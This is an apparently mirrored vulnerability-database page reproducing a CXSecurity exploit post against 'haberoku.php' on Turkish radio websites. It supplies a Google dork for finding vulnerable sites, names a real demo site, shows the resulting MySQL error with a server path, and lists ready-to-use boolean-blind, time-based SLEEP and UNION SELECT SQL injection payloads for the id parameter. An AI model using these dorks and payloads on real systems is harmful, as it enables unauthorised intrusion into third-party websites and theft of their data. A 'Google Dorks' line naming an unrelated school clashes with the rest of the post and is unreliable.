Turkish Radio Web Page SQL İnjection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1605783 漏洞类型
发布时间 2019-05-12 更新时间 2019-05-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050134
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Exploit Title : 
# Author [ Discovered By ] : Prototyqe - furkan Özer
# Team : Cyberizm Digital Security Army
# Date : 10/05/2019
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : Mary Rose School Hong Kong
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]

# Dork : inurl:"haberoku.php?id=" intext:"radyo"

Demo web page : 

http://www.radyoumut.co.uk/haberoku.php?id=123'

sql vul : 


Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/hisarfm/public_html/haberoku.php on line 117



/haberoku.php?id=[ SQL-İnjection]

payload 
: Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=133 AND 8825=8825

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=133 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: id=133 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71767a7a71,0x7758786552774d4847497458736653556d4e415842494f74476d525a5449577a7057447156465270,0x7170787671),NULL,NULL,NULL,NULL,NULL,NULL-- ZLin